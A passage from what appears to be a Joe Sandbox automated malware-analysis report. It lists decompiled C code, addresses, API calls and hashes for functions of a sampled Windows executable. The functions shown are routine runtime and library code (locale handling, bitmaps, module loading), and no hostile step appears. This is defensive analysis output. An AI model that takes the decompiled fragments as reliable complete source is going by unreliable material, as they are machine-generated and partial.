					} while (_t35 == 0);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t90 - 0xc));
				return _t35;
			}












                                                                              0x00407458
                                                                              0x0040746f
                                                                              0x0040747b
                                                                              0x0040747d
                                                                              0x00407485
                                                                              0x0040748c
                                                                              0x00407492
                                                                              0x00407497
                                                                              0x004074a2
                                                                              0x004074a5
                                                                              0x004074b6
                                                                              0x004074c5
                                                                              0x004074d0
                                                                              0x004074db
                                                                              0x004074eb
                                                                              0x004074ef
                                                                              0x004074f3
                                                                              0x004074f8
                                                                              0x004074fc
                                                                              0x00407500
                                                                              0x00407509
                                                                              0x00407502
                                                                              0x00407502
                                                                              0x00407502
                                                                              0x0040750f
                                                                              0x00407514
                                                                              0x00407519
                                                                              0x0040751b
                                                                              0x00407520
                                                                              0x00407520
                                                                              0x00407527
                                                                              0x00407528
                                                                              0x00407530
                                                                              0x00407533
                                                                              0x00407533
                                                                              0x00407538
                                                                              0x0040753d
                                                                              0x00407541
                                                                              0x00407546
                                                                              0x00407546
                                                                              0x00407549
                                                                              0x0040754e
                                                                              0x00407552
                                                                              0x00407557
                                                                              0x00407557
                                                                              0x0040755a
                                                                              0x00407561
                                                                              0x00407566
                                                                              0x00407569
                                                                              0x00407569
                                                                              0x00407577
                                                                              0x00407583
                                                                              0x00407585
                                                                              0x0040758a
                                                                              0x00407593
                                                                              0x00407598
                                                                              0x004075a0

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00407458
                                                                                • Part of subcall function 0041FCB0: lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                                • Part of subcall function 0041FCB0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                                • Part of subcall function 0040626B: VariantInit.OLEAUT32(?), ref: 0040627C
                                                                                • Part of subcall function 00407269: __EH_prolog.LIBCMT ref: 0040726E
                                                                              • VariantClear.OLEAUT32(?), ref: 0040752C
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00407562
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearH_prolog$ByteCharInitMultiWidelstrlen
                                                                              • String ID: FirstName
                                                                              • API String ID: 3181333722-2707629045
                                                                              • Opcode ID: 6fb0c1d3faa66efec5098600f0f34553dc5c398980d83c924bc962ee77c85e0d
                                                                              • Instruction ID: 22f998c9cbba617c28ef7d94ed856b703e2d021c0dbe949c4917130d903b6a6d
                                                                              • Opcode Fuzzy Hash: 6fb0c1d3faa66efec5098600f0f34553dc5c398980d83c924bc962ee77c85e0d
                                                                              • Instruction Fuzzy Hash: CF315271A042449BCF08FBF584657EE77A95F44308F04447EA406F72C2DF3DAA55876A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042CD1A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 96%
                                                                              			E0042CD1A(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t24;
				unsigned int _t25;
				int _t31;
				signed int _t38;
				struct HBITMAP__* _t40;
				int _t43;
				int _t45;
				void* _t48;
				signed int* _t52;
				signed int _t57;
				signed int _t61;
				void* _t62;
				void* _t64;
				void* _t66;

				_t48 = __edx;
				_t64 = _t66 - 0x78;
				_t24 =  *0x457184; // 0xb7aa1229
				 *((intOrPtr*)(_t64 + 0x74)) = _t24;
				_t25 = GetMenuCheckMarkDimensions();
				_t43 = _t25;
				_t45 = _t25 >> 0x10;
				 *(_t64 - 0x18) = _t45;
				if(_t43 > 0x20) {
					_t43 = 0x20;
				}
				_t4 = _t43 - 4; // 0x1c
				asm("cdq");
				_t5 = _t43 + 0xf; // 0x2f
				_t61 = _t5 >> 4;
				_t57 = (_t4 - _t48 >> 1) + (_t61 << 4) - _t43;
				if(_t57 > 0xc) {
					_t57 = 0xc;
				}
				_t31 = 0x20;
				if(_t45 > _t31) {
					 *(_t64 - 0x18) = _t31;
				}
				E00412140(_t64 - 0xc, 0xff, 0x80);
				_t52 = _t64 + ( *(_t64 - 0x18) - 6 >> 1) * _t61 * 2 - 0xc;
				 *(_t64 - 0x10) = 0x449478;
				_t62 = _t61 + _t61;
				 *((intOrPtr*)(_t64 - 0x14)) = 5;
				do {
					 *(_t64 - 0x10) =  &(( *(_t64 - 0x10))[1]);
					_t38 =  !(( *( *(_t64 - 0x10)) & 0x000000ff) << _t57);
					 *_t52 = _t38;
					_t52[0] = _t38;
					_t52 = _t52 + _t62;
					_t19 = _t64 - 0x14;
					 *_t19 =  *((intOrPtr*)(_t64 - 0x14)) - 1;
				} while ( *_t19 != 0);
				_t40 = CreateBitmap(_t43,  *(_t64 - 0x18), 1, 1, _t64 - 0xc);
				 *0x45a360 = _t40;
				if(_t40 == 0) {
					 *0x45a360 = _t40;
				}
				return E00412FBB(_t40,  *((intOrPtr*)(_t64 + 0x74)));
			}

















                                                                              0x0042cd1a
                                                                              0x0042cd1b
                                                                              0x0042cd25
                                                                              0x0042cd2d
                                                                              0x0042cd30
                                                                              0x0042cd36
                                                                              0x0042cd3f
                                                                              0x0042cd42
                                                                              0x0042cd45
                                                                              0x0042cd49
                                                                              0x0042cd49
                                                                              0x0042cd4a
                                                                              0x0042cd4d
                                                                              0x0042cd50
                                                                              0x0042cd53
                                                                              0x0042cd61
                                                                              0x0042cd66
                                                                              0x0042cd6a
                                                                              0x0042cd6a
                                                                              0x0042cd6d
                                                                              0x0042cd70
                                                                              0x0042cd72
                                                                              0x0042cd72
                                                                              0x0042cd83
                                                                              0x0042cd96
                                                                              0x0042cd9a
                                                                              0x0042cda1
                                                                              0x0042cda3
                                                                              0x0042cdaa
                                                                              0x0042cdb5
                                                                              0x0042cdb8
                                                                              0x0042cdba
                                                                              0x0042cdbc
                                                                              0x0042cdbf
                                                                              0x0042cdc1
                                                                              0x0042cdc1
                                                                              0x0042cdc1
                                                                              0x0042cdd2
                                                                              0x0042cddc
                                                                              0x0042cde2
                                                                              0x0042cdf0
                                                                              0x0042cdf0
                                                                              0x0042ce01

                                                                              APIs
                                                                              • GetMenuCheckMarkDimensions.USER32 ref: 0042CD30
                                                                              • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0042CDD2
                                                                              • LoadBitmapA.USER32 ref: 0042CDEA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                                                              • String ID:
                                                                              • API String ID: 2596413745-3916222277
                                                                              • Opcode ID: d7c9fb92b5efe179fd426076629671e5cd4ece26ba5f69d4e276d5057d3b9958
                                                                              • Instruction ID: 466963c9648dca894fd8a1441b2f17f1d41f046d24833c68511cb02646e1ea80
                                                                              • Opcode Fuzzy Hash: d7c9fb92b5efe179fd426076629671e5cd4ece26ba5f69d4e276d5057d3b9958
                                                                              • Instruction Fuzzy Hash: A2210771E002199FEB20CFA8EDC9AAE7BB5EB84301F040576E905EB291E7749544CB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004202BA, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 57%
                                                                              			E004202BA(void* __ecx) {
				signed int _t27;
				void* _t31;
				signed char _t37;
				signed char _t40;
				void* _t47;

				E004128A0(E00431557, _t47);
				_t27 =  *(_t47 + 8) & 0x00000017;
				 *(__ecx + 8) = _t27;
				_t40 =  *(__ecx + 0xc) & _t27;
				if(_t40 != 0) {
					if( *((intOrPtr*)(_t47 + 0xc)) == 0) {
						__eflags = _t40 & 0x00000004;
						if(__eflags == 0) {
							_t37 = 2;
							__eflags = _t37 & _t40;
							if(__eflags == 0) {
								E00420298(_t47 - 0x94, __eflags, "ios_base::eofbit set");
								_push(_t47 - 0x94);
								 *((intOrPtr*)(_t47 - 4)) = 0;
								E00420235(_t47 - 0x78, __eflags);
								 *((intOrPtr*)(_t47 - 0x78)) = 0x44e5d0;
								_push(0x4532dc);
								_t31 = _t47 - 0x78;
							} else {
								E00420298(_t47 - 0x50, __eflags, "ios_base::failbit set");
								 *((intOrPtr*)(_t47 - 4)) = 1;
								goto L5;
							}
						} else {
							E00420298(_t47 - 0x50, __eflags, "ios_base::badbit set");
							 *((intOrPtr*)(_t47 - 4)) = 0;
							L5:
							_push(_t47 - 0x50);
							E00420235(_t47 - 0x34, __eflags);
							 *((intOrPtr*)(_t47 - 0x34)) = 0x44e5d0;
							_push(0x4532dc);
							_t31 = _t47 - 0x34;
						}
						_push(_t31);
					} else {
						_push(0);
						_push(0);
					}
					_t27 = E004128BF();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t27;
			}








                                                                              0x004202bf
                                                                              0x004202cd
                                                                              0x004202d0
                                                                              0x004202d6
                                                                              0x004202d8
                                                                              0x004202e3
                                                                              0x004202ec
                                                                              0x004202ef
                                                                              0x00420320
                                                                              0x00420321
                                                                              0x00420323
                                                                              0x00420346
                                                                              0x00420351
                                                                              0x00420355
                                                                              0x00420358
                                                                              0x0042035d
                                                                              0x00420364
                                                                              0x00420369
                                                                              0x00420325
                                                                              0x0042032d
                                                                              0x00420332
                                                                              0x00000000
                                                                              0x00420332
                                                                              0x004202f1
                                                                              0x004202f9
                                                                              0x004202fe
                                                                              0x00420301
                                                                              0x00420304
                                                                              0x00420308
                                                                              0x0042030d
                                                                              0x00420314
                                                                              0x00420319
                                                                              0x00420319
                                                                              0x0042036c
                                                                              0x004202e5
                                                                              0x004202e5
                                                                              0x004202e6
                                                                              0x004202e6
                                                                              0x0042036d
                                                                              0x0042036d
                                                                              0x00420375
                                                                              0x0042037d

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                              • API String ID: 3519838083-1866435925
                                                                              • Opcode ID: 79ebf55eb55cb205d2495990de9d74f1dfb77c99cfbfb72c0f0e6fde5a8e46bf
                                                                              • Instruction ID: a01fc7ce836ce9bef13a97eee2cabd1fa3b6f243fbc551c372b3e635789312fc
                                                                              • Opcode Fuzzy Hash: 79ebf55eb55cb205d2495990de9d74f1dfb77c99cfbfb72c0f0e6fde5a8e46bf
                                                                              • Instruction Fuzzy Hash: 21115771A00128EBD700DFD1E995BDDB7B47B00308FA4845FA50667543DB795E45CB1C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00420BA9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E00420BA9(void* __ebx, void* __eflags) {
				void* __edi;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t44;

				_t28 = __ebx;
				E004128A0(E004315B3, _t44);
				E00421916(_t44 - 0x14, 0);
				_t42 =  *0x45a90c; // 0x5c0b48
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t42;
				_t39 = E004219C6( *((intOrPtr*)(_t44 + 8)), E00420663(0x45aa30));
				if(_t39 == 0) {
					if(_t42 == 0) {
						_push(_t44 - 0x10);
						if(E004208A1(__ebx) == 0xffffffff) {
							E004225BC(_t44 - 0x20, "bad cast");
							E004128BF(_t44 - 0x20, 0x4534d8);
						}
						_t39 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x45a90c = _t39;
						E0042005A(_t39);
						E00421A3E(_t28, _t39, _t39);
					} else {
						_t39 = _t42;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E00421939(_t44 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return _t39;
			}







                                                                              0x00420ba9
                                                                              0x00420bae
                                                                              0x00420bbd
                                                                              0x00420bc2
                                                                              0x00420bc8
                                                                              0x00420bd1
                                                                              0x00420be2
                                                                              0x00420be6
                                                                              0x00420bea
                                                                              0x00420bf3
                                                                              0x00420bfd
                                                                              0x00420c07
                                                                              0x00420c15
                                                                              0x00420c15
                                                                              0x00420c1a
                                                                              0x00420c1f
                                                                              0x00420c25
                                                                              0x00420c2c
                                                                              0x00420bec
                                                                              0x00420bec
                                                                              0x00420bec
                                                                              0x00420bea
                                                                              0x00420c31
                                                                              0x00420c38
                                                                              0x00420c44
                                                                              0x00420c4c

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prologIncrefstd::locale::facet::_
                                                                              • String ID: bad cast
                                                                              • API String ID: 931760182-3145022300
                                                                              • Opcode ID: 6239ec138047089c61464696ff57aa4ca2c9a5dcaa3553e8e0aa90186cb2331b
                                                                              • Instruction ID: 7646712c7103c562e122446d79630f377676aed2ed7ba1a7b97c37107fb7ea14
                                                                              • Opcode Fuzzy Hash: 6239ec138047089c61464696ff57aa4ca2c9a5dcaa3553e8e0aa90186cb2331b
                                                                              • Instruction Fuzzy Hash: 5A1106B1B001349BCB04FB56E9127AEB374AF90315F90461FF411A72D2CB7C9A01C799
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00420FE5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 90%
                                                                              			E00420FE5(void* __ebx, void* __edi, void* __eflags) {
				intOrPtr _t18;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t44;
				void* _t46;

				_t40 = __edi;
				_t30 = __ebx;
				E004128A0(E004315B3, _t46);
				E00421916(_t46 - 0x14, 0);
				_t18 =  *0x45a914; // 0x0
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				 *((intOrPtr*)(_t46 - 0x10)) = _t18;
				_t44 = E004219C6( *((intOrPtr*)(_t46 + 8)), E00420663(0x45a9b0));
				if(_t44 == 0) {
					_t44 =  *((intOrPtr*)(_t46 - 0x10));
					if(_t44 == 0) {
						_push(_t46 - 0x10);
						if(E00421089(__ebx) == 0xffffffff) {
							E004225BC(_t46 - 0x20, "bad cast");
							E004128BF(_t46 - 0x20, 0x4534d8);
						}
						_t37 =  *((intOrPtr*)(_t46 - 0x10));
						_push(_t40);
						_t44 = _t37;
						 *0x45a914 = _t37;
						E0042005A(_t37);
						E00421A3E(_t30, _t37, _t37);
					}
				}
				 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
				E00421939(_t46 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
				return _t44;
			}








                                                                              0x00420fe5
                                                                              0x00420fe5
                                                                              0x00420fea
                                                                              0x00420ff8
                                                                              0x00420ffd
                                                                              0x00421002
                                                                              0x0042100b
                                                                              0x0042101c
                                                                              0x00421020
                                                                              0x00421022
                                                                              0x00421027
                                                                              0x0042102c
                                                                              0x00421036
                                                                              0x00421040
                                                                              0x0042104e
                                                                              0x0042104e
                                                                              0x00421053
                                                                              0x00421056
                                                                              0x00421057
                                                                              0x00421059
                                                                              0x00421061
                                                                              0x00421068
                                                                              0x0042106d
                                                                              0x00421027
                                                                              0x0042106e
                                                                              0x00421075
                                                                              0x00421080
                                                                              0x00421088

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00420FEA
                                                                              • int.LIBCPMT ref: 0042100E
                                                                                • Part of subcall function 00421089: __EH_prolog.LIBCMT ref: 0042108E
                                                                              • std::locale::facet::_Incref.LIBCPMT ref: 00421061
                                                                                • Part of subcall function 004128BF: RaiseException.KERNEL32(?,?,?,?,0045A0D8,00000000), ref: 004128ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$ExceptionIncrefRaisestd::locale::facet::_
                                                                              • String ID: bad cast
                                                                              • API String ID: 854657108-3145022300
                                                                              • Opcode ID: 31631b0ea149f4234278b6ee19938042c7a2eb6258395781997413644070bb3b
                                                                              • Instruction ID: 665209f4067d6d268fc5e6a63874f43f06b626683c65bfbba0b9105d0ed3fcea
                                                                              • Opcode Fuzzy Hash: 31631b0ea149f4234278b6ee19938042c7a2eb6258395781997413644070bb3b
                                                                              • Instruction Fuzzy Hash: F911C1B1F00234ABCB14EBA5E912AAE7364AB54314F91461FF411A72E2CB7C8A408798
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C629, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E0042C629(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v276;
				intOrPtr _t10;
				long _t12;
				void* _t13;
				CHAR* _t16;
				void* _t30;
				void* _t33;

				_t10 =  *0x457184; // 0xb7aa1229
				_v8 = _t10;
				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
				if(_t12 == 0 || _t12 == 0x104) {
					L4:
					_t13 = 0;
				} else {
					_push(__esi);
					_push(__edi);
					_t16 = PathFindExtensionA( &_v276);
					asm("movsd");
					asm("movsw");
					asm("movsb");
					_pop(_t30);
					_pop(_t33);
					if(_t16 -  &_v276 + 7 > 0x104) {
						goto L4;
					} else {
						lstrcpyA(_t16,  &_v16);
						_t13 = E0042C343(0x104, _t30, _t33,  &_v276);
					}
				}
				return E00412FBB(_t13, _v8);
			}












                                                                              0x0042c632
                                                                              0x0042c638
                                                                              0x0042c64b
                                                                              0x0042c653
                                                                              0x0042c6a0
                                                                              0x0042c6a0
                                                                              0x0042c659
                                                                              0x0042c659
                                                                              0x0042c65a
                                                                              0x0042c662
                                                                              0x0042c670
                                                                              0x0042c671
                                                                              0x0042c67d
                                                                              0x0042c683
                                                                              0x0042c684
                                                                              0x0042c685
                                                                              0x00000000
                                                                              0x0042c687
                                                                              0x0042c68c
                                                                              0x0042c699
                                                                              0x0042c699
                                                                              0x0042c685
                                                                              0x0042c6ac

                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0042C64B
                                                                              • PathFindExtensionA.SHLWAPI(?), ref: 0042C662
                                                                              • lstrcpyA.KERNEL32(00000000,?), ref: 0042C68C
                                                                                • Part of subcall function 0042C343: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0042C366
                                                                                • Part of subcall function 0042C343: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0042C371
                                                                                • Part of subcall function 0042C343: ConvertDefaultLocale.KERNEL32(?), ref: 0042C3A2
                                                                                • Part of subcall function 0042C343: ConvertDefaultLocale.KERNEL32(?), ref: 0042C3AA
                                                                                • Part of subcall function 0042C343: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042C3B7
                                                                                • Part of subcall function 0042C343: ConvertDefaultLocale.KERNEL32(?), ref: 0042C3D1
                                                                                • Part of subcall function 0042C343: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0042C3D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                              • String ID: %s.dll
                                                                              • API String ID: 4178508759-3668843792
                                                                              • Opcode ID: 0d83078e46f4f7abbcd87e5b3769130cdcc8ec084be9341a9bf6b0554823ebfa
                                                                              • Instruction ID: 93014bb54645c6d4f552ad3928b98ba6e491190312b9504a5209be15561fadef
                                                                              • Opcode Fuzzy Hash: 0d83078e46f4f7abbcd87e5b3769130cdcc8ec084be9341a9bf6b0554823ebfa
                                                                              • Instruction Fuzzy Hash: EE018871A00118ABCF15DFB4ED859EFB7BCEB48300F4404BAA606D3141D6B49A458B54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041AD20, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 62%
                                                                              			E0041AD20(void* __eflags) {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_push(0x10);
				_push(0x44cc68);
				E00412BA4(_t13, _t14, _t15);
				_t9 =  *0x45a830;
				if(_t9 == 0) {
					if( *0x45a3f0 == 1) {
						L4:
						_t9 = E0041AD10;
						 *0x45a830 = E0041AD10;
					} else {
						_t12 = GetModuleHandleA("kernel32.dll");
						if(_t12 == 0) {
							goto L4;
						} else {
							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
							 *0x45a830 = _t9;
							if(_t9 == 0) {
								goto L4;
							}
						}
					}
				}
				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
				return E00412BDF(_t10);
			}









                                                                              0x0041ad20
                                                                              0x0041ad22
                                                                              0x0041ad27
                                                                              0x0041ad2c
                                                                              0x0041ad33
                                                                              0x0041ad3c
                                                                              0x0041ad62
                                                                              0x0041ad62
                                                                              0x0041ad67
                                                                              0x0041ad3e
                                                                              0x0041ad43
                                                                              0x0041ad4b
                                                                              0x00000000
                                                                              0x0041ad4d
                                                                              0x0041ad53
                                                                              0x0041ad59
                                                                              0x0041ad60
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ad60
                                                                              0x0041ad4b
                                                                              0x0041ad3c
                                                                              0x0041ad6c
                                                                              0x0041ad78
                                                                              0x0041ada1
                                                                              0x0041adaa

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,0044CC68,00000010,004147D0,00000000,00000FA0,74B04DE0,00000000,00416411,00412E3E,?,0044BC68,00000060), ref: 0041AD43
                                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 0041AD53
                                                                              Strings
                                                                              • InitializeCriticalSectionAndSpinCount, xrefs: 0041AD4D
                                                                              • kernel32.dll, xrefs: 0041AD3E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                              • API String ID: 1646373207-3733552308
                                                                              • Opcode ID: 5b2b6ff3261692e85f50454db1c6354fcf8f14c476355ffba9d11ac6989c9739
                                                                              • Instruction ID: 863186edba7a30bb6a15ea8557114f505acaba35b9ff552a889fbd431f584582
                                                                              • Opcode Fuzzy Hash: 5b2b6ff3261692e85f50454db1c6354fcf8f14c476355ffba9d11ac6989c9739
                                                                              • Instruction Fuzzy Hash: ABF05430A41705ABDF20AF64AD497DA37B1BB40716B144227E818D26A1D77CC9B1D71F
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041A306, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E0041A306() {
				signed int _v12;
				signed long long _v20;
				signed long long _v28;
				signed char _t9;

				_t9 = GetModuleHandleA("KERNEL32");
				if(_t9 == 0) {
					L6:
					_v12 =  *0x44cba8;
					_v20 =  *0x44cba0;
					asm("fsubr qword [ebp-0x10]");
					_v28 = _v20 / _v12 * _v12;
					asm("fcomp qword [0x44cb98]");
					asm("fnstsw ax");
					if((_t9 & 0x00000041) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                              0x0041a30b
                                                                              0x0041a313
                                                                              0x0041a32a
                                                                              0x0041a2d2
                                                                              0x0041a2db
                                                                              0x0041a2e7
                                                                              0x0041a2ea
                                                                              0x0041a2f0
                                                                              0x0041a2f6
                                                                              0x0041a2fb
                                                                              0x0041a305
                                                                              0x0041a2fd
                                                                              0x0041a301
                                                                              0x0041a301
                                                                              0x0041a315
                                                                              0x0041a31b
                                                                              0x0041a323
                                                                              0x00000000
                                                                              0x0041a325
                                                                              0x0041a325
                                                                              0x0041a329
                                                                              0x0041a329
                                                                              0x0041a323

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,00414048), ref: 0041A30B
                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0041A31B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
